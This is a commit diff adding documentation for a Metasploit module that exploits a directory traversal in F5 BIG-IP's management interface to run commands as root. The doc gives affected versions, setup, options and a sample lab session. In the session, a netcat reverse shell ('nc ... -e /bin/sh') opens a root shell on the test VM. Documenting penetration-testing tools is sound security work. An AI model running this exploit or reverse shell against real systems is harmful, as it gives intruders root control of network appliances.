Add module doc
This commit is contained in:
parent
c8176b803a
commit
ac3b31a911
|
@ -0,0 +1,108 @@
|
|||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits a directory traversal in F5's BIG-IP Traffic
|
||||
Management User Interface (TMUI) to upload a shell script and execute
|
||||
it as the root user.
|
||||
|
||||
Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
|
||||
15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
|
||||
in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
|
||||
|
||||
Tested on the VMware OVA release of 14.1.2.
|
||||
|
||||
### Setup
|
||||
|
||||
Download
|
||||
[BIGIP-14.1.2-0.0.37.ALL-scsi.ova](https://downloads.f5.com/esd/serveDownload.jsp?path=/big-ip/big-ip_v14.x/14.1.2/english/virtual-edition/&sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2&container=Virtual-Edition&file=BIGIP-14.1.2-0.0.37.ALL-scsi.ova)
|
||||
and import it into your desired virtualization software.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Targets
|
||||
|
||||
### 0
|
||||
|
||||
This executes a Unix command.
|
||||
|
||||
### 1
|
||||
|
||||
This uses a Linux dropper to execute code.
|
||||
|
||||
## Options
|
||||
|
||||
### WritableDir
|
||||
|
||||
Set this to a writable directory in which files will be dropped.
|
||||
Defaults to `/tmp`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### F5 BIG-IP 14.1.2 in VMware Fusion
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
|
||||
[*] Using configured payload cmd/unix/reverse_netcat_gaping
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
|
||||
|
||||
Module options (exploit/linux/http/f5_bigip_tmui_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI / yes Base path
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_netcat_gaping):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Unix Command
|
||||
|
||||
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.176
|
||||
rhosts => 172.16.249.176
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
|
||||
lhost => 172.16.249.1
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
|
||||
|
||||
[+] nc 172.16.249.1 4444 -e /bin/sh
|
||||
[*] Started reverse TCP handler on 172.16.249.1:4444
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
|
||||
[*] Creating alias list=bash
|
||||
[+] Successfully created alias list=bash
|
||||
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
|
||||
[*] Executing command: nc 172.16.249.1 4444 -e /bin/sh
|
||||
[*] Uploading /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
|
||||
[+] Successfully uploaded /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
|
||||
[*] Executing /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
|
||||
[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.176:44736) at 2020-07-06 18:05:24 -0500
|
||||
[+] Deleted /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
|
||||
[*] Deleting alias list=bash
|
||||
[+] Successfully deleted alias list=bash
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
Loading…
Reference in New Issue